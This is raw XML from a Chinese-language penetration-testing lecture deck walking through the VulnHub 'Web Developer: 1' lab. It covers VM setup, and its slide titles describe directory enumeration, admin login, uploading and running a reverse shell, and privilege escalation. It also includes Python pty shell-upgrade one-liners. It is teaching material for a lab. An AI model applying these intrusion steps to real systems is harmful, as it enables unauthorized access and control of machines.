                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD153561-FED8-4A85-BFD1-039CEA7BC63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962536" y="3432983"/>
            <a:ext cx="3877857" cy="42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python3 -c 'import pty;pty.spawn("/bin/bash")';</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;352;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF1E8158-3D33-4D40-81C1-41E07796B196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962536" y="1504749"/>
            <a:ext cx="3884531" cy="42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accent3"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200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python -c 'import pty;pty.spawn("/bin/bash")';</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/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F0414418-CE50-4ABB-B3F9-69A3806D7607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670273" y="1625514"/>
            <a:ext cx="220258" cy="119080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CB9467-5AE6-4064-A7A9-9E8C47F0F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285" y="3058379"/>
            <a:ext cx="3915321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2000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blip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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702900" y="486870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altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Thank you for being such a wonderful audience!</a:t>
            </a:r>
            <a:endParaRPr sz="2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4" name="Google Shape;394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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702650" y="2135824"/>
            <a:ext cx="7729017" cy="2129151"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>下載靶機檔案  (WEB DEVELOPER: 1)</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702650" y="1084326"/>
            <a:ext cx="844135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 "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100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https://www.vulnhub.com/entry/web-developer-1,288/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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1084326"/>
            <a:ext cx="927749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1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URL:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Google Shape;7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6117" y="2243620"/>
            <a:ext cx="7514867" cy="190663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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017322" y="3544134"/>
            <a:ext cx="5510293" cy="253506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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990154" y="2438261"/>
            <a:ext cx="3163691" cy="7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tserrat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開始建環境!!</a:t>
            </a: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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096594" y="3938048"/>
            <a:ext cx="6498933" cy="377381"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25100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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981144" y="2234829"/>
            <a:ext cx="4058067" cy="1074587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6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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>建立 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>虛擬機</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1353381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建立一個資料夾，命名為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 Developer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，將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kali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檔案、模擬機檔案皆放入並解壓縮。</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226930" y="1857449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開啟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Vmware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，點選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Open a Virtual Machine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" name="Google Shape;92;p6" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_4ec2215ee3351c591ce7b9b35d187cef.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398475&amp;Signature=6iCipG0TYufhYrWynrzy0VqEMc4%3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6594" y="2313677"/>
            <a:ext cx="384810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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226929" y="3498106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點選資料夾內的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kali.vmx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檔案</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="Google Shape;94;p6" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_02959ee9bb906c2e1eb35eda88be01ad.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398527&amp;Signature=N3IYScOsVyGDwvHlr8IP218MY%2Bc%3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7212" y="3988259"/>
            <a:ext cx="6344896" cy="27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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735361" y="3558394"/>
            <a:ext cx="3063573" cy="1537298"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6823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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2956437"/>
            <a:ext cx="5846820" cy="377381"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25100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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981144" y="1467267"/>
            <a:ext cx="4058067" cy="1074587"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3876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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>建立 </a:t>
            </a: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Web develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>虛擬機</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226930" y="1089887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開啟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Vmware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，點選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Open a Virtual Machine</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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p7" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_4ec2215ee3351c591ce7b9b35d187cef.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398475&amp;Signature=6iCipG0TYufhYrWynrzy0VqEMc4%3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6594" y="1546115"/>
            <a:ext cx="384810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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226929" y="2627185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點選資料夾內的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WebDeveloper.ova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檔案</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Google Shape;10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3814" y="3011758"/>
            <a:ext cx="5696745" cy="26673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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226928" y="3365480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輸入模擬機名稱</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Google Shape;10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2" y="3652198"/>
            <a:ext cx="2884469" cy="136446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latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>啟動 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Kali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" name="Google Shape;116;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886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Kali</a:t>
            </a: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的憑證為 </a:t>
            </a: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kali / kali</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226930" y="1697954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開啟 F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irefox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，打開 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Youtube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，確定是否有網路</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226929" y="2202022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檢查</a:t>
            </a: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DHCP</a:t>
            </a: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是否成功分配</a:t>
            </a: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IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="Google Shape;11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184" y="3210158"/>
            <a:ext cx="3701557" cy="171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8" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_146f2b705caf7afd572188eca4aac79b.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399300&amp;Signature=%2BCLftYpVB9yewy0FMnTiiule9dA%3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3022495"/>
            <a:ext cx="4411811" cy="131377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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992536" y="2832778"/>
            <a:ext cx="244285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開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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terminal</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556479" y="2644088"/>
            <a:ext cx="244285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ip a</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913562" y="4401985"/>
            <a:ext cx="244285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eth0</a:t>
            </a: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為網卡名稱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ontserrat"/>
              <a:buNone/>
            </a:pP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192.168.x.x</a:t>
            </a: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為 </a:t>
            </a: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kali </a:t>
            </a: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的動態</a:t>
            </a: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IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170666" y="2309361"/>
            <a:ext cx="4054262" cy="2667559"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500999" y="2364561"/>
            <a:ext cx="4567157" cy="1979759"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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0" y="403301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>
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>啟動 </a:t>
            </a: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Web developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="Microsoft JhengHei"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>靶機</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="7181711" cy="3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1200" b="1" i="0" u="none" strike="noStrike" cap="none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設定網路模式為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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NAT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Google Shape;133;p9" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_36cffbb0b74c28747fa091e4f3b2f61d.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399805&amp;Signature=aTNu9r49qEzZ%2Bk4hgpNePbo09ww%3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1162" y="2456198"/>
            <a:ext cx="4332172" cy="1791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9" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_1056394bac224da55f6bdcf854c28afa.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399769&amp;Signature=fvAs%2F2evpNBRer8QIQZZuHoCo6c%3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351" y="2456198"/>
            <a:ext cx="3818021" cy="240086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ivine Meeting XL by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="595959"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEEEEE"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="27316F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="75C4C0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFC800"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="FFFFFF"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="C2C2C2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F2F2F2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="27316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1012</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (16:9)</PresentationFormat>
  <Paragraphs>248</Paragraphs>
  <Slides>35</Slides>
  <Notes>35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2" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Livine Meeting XL by Slidesgo</vt:lpstr>
      <vt:lpstr>滲透測試(2)</vt:lpstr>
      <vt:lpstr>下載 Vmware </vt:lpstr>
      <vt:lpstr>下載 Kali </vt:lpstr>
      <vt:lpstr>下載靶機檔案  (WEB DEVELOPER: 1)</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>建立 Kali 虛擬機</vt:lpstr>
      <vt:lpstr>建立 Web develop 虛擬機</vt:lpstr>
      <vt:lpstr>啟動 Kali</vt:lpstr>
      <vt:lpstr>啟動 Web developer 靶機</vt:lpstr>
      <vt:lpstr>啟動 Web developer 靶機</vt:lpstr>
      <vt:lpstr>檢查 kali 是否成功可以偵測到模擬機</vt:lpstr>
      <vt:lpstr>瀏覽網頁服務</vt:lpstr>
      <vt:lpstr>目錄枚舉 (Directory enumeration)</vt:lpstr>
      <vt:lpstr>目錄枚舉 (Directory enumeration)</vt:lpstr>
      <vt:lpstr>查看枚舉後的收穫</vt:lpstr>
      <vt:lpstr>查看枚舉後的收穫</vt:lpstr>
      <vt:lpstr>查看封包</vt:lpstr>
      <vt:lpstr>查看封包</vt:lpstr>
      <vt:lpstr>查看封包</vt:lpstr>
      <vt:lpstr>登入後台</vt:lpstr>
      <vt:lpstr>尋找注入點</vt:lpstr>
      <vt:lpstr>上傳 Reverse shell 的惡意檔案</vt:lpstr>
      <vt:lpstr>上傳 Reverse shell 的惡意檔案</vt:lpstr>
      <vt:lpstr>上傳 Reverse shell 的惡意檔案</vt:lpstr>
      <vt:lpstr>上傳 Reverse shell 的惡意檔案</vt:lpstr>
      <vt:lpstr>上傳 Reverse shell 的惡意檔案</vt:lpstr>
      <vt:lpstr>執行 Reverse shell</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>蒐集資訊，提升權限</vt:lpstr>
      <vt:lpstr>Thank you for being such a wonderful audience!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11/29 網路安全demo</dc:title>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-25T07:02:02Z</dcterms:modified>
</cp:coreProperties>
</file>